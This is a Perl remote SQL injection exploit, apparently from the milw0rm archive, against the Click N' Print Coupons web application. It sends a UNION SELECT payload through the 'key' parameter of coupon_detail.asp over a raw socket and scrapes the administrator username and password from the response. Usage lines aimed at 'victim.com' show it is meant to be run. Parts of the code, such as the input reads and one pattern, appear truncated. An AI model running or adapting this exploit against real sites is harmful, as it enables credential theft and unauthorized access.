#!/usr/bin/perl #[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit #[Coded by : ajann #[Author : ajann #[Contact : :( #[S.Page : http://www.websitedesignsforless.com #[$$ : $9.95 #[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. #[.. : ajann,Turkey # 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201 use IO::Socket; if(@ARGV < 1){ print " [======================================================================== [// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit [// Usage: exploit.pl [target] [// Example: exploit.pl victim.com [// Example: exploit.pl victim.com [// Vuln&Exp : ajann [======================================================================== "; exit(); } #Local variables $server = $ARGV[0]; $server =~ s/(http:\/\/)//eg; $host = "http://".$server; $port = "80"; $file = "/coupon_detail.asp?key="; print "Script : "; $dir = ; chop ($dir); if ($dir =~ /exit/){ print "-- Exploit Failed[You Are Exited] \n"; exit(); } if ($dir =~ /\//){} else { print "-- Exploit Failed[No DIR] \n"; exit(); } print "User : "; $ID = ; chop ($ID); if ($ID =~ /exit/){ print "-- Exploit Failed[You Are Exited] \n"; exit(); } $len=length($ID); if ($len == 1){} else { print "-- Exploit Failed[No User Id] \n"; exit(); } $target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; $target = $host.$dir.$file.$target; #Writing data to socket print "+**********************************************************************+\n"; print "+ Trying to connect: $server\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; print $socket "GET $target HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; print "+ Connected!...\n"; #Getting while($answer = <$socket>) { if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){ print "+ Exploit succeed! Getting admin information.\n"; print "+ ---------------- +\n"; print "+ Username: $1\n"; } if ($answer =~ /(.*?)
/){ print "+ Password: $1\n"; } if ($answer =~ /Syntax error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } if ($answer =~ /Internal Server Error/) { print "+ Exploit Failed : ( \n"; print "+**********************************************************************+\n"; exit(); } } # milw0rm.com [2006-12-30]